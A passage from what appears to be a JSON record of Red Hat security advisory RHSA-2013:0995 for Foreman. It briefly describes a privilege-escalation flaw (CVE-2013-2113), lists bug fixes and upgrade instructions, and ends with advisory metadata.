A non-admin user with privileges to create non-admin\naccounts could use this flaw to create admin accounts, giving them control\nof the system running Foreman (such as installing new packages) and all\nsystems managed by Foreman. (CVE-2013-2113)\n\nThese issues were discovered by Ramon de C Valle of the Red Hat Product\nSecurity Team.\n\nThis update also fixes the following bugs:\n\n* The cron job for Puppet had an incorrect path when installed via the\nForeman installer. (BZ#969531)\n\n* This update removes provisioning templates and installation media for\nunsupported client operating systems. (BZ#971545)\n\n* Previously, the init script for Foreman was installed in the /opt/\ndirectory, resulting in errors when attempting to use the \"service\"\ncommand to control Foreman, and errors when installing or upgrading the\nForeman packages. As the Foreman service is not needed for Red Hat\nOpenStack, this update removes the init script. (BZ#972755)\n\n* Previously, after using Foreman to install controller and compute nodes,\nit was not possible to launch compute instances. (BZ#972780)\n\n* Previously, Foreman compiled assets for an incorrect path. The assets\nwere configured for \"[fully qualified domain name]/foreman\", which is not\nwhere Foreman is served from in Red Hat OpenStack. (BZ#975068)\n\n* Previously, the Foreman installer used a reference to an OpenStack\nhost's network interface instead of its own secondary interface when\ncreating a subnet, which could cause subnet creation to fail and a \"rake\naborted!\" message to be displayed. (BZ#976907)\n\nUsers of Foreman are advised to upgrade to these updated packages, which\ncorrect these issues. In Red Hat OpenStack, Foreman runs on the Apache HTTP\nServer using mod_passenger. 
As such, after installing the updated packages,\nthe httpd service must be restarted (\"service httpd restart\") for this\nupdate to take effect.\n", "modified": "2018-06-13T01:27:37", "published": "2013-06-27T04:00:00", "id": "RHSA-2013:0995", "href": "https://access.redhat.com/errata/RHSA-2013:0995", "type": "redhat", "title": "(RHSA-2013:0995) Important: Foreman security and bug fix update", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}]}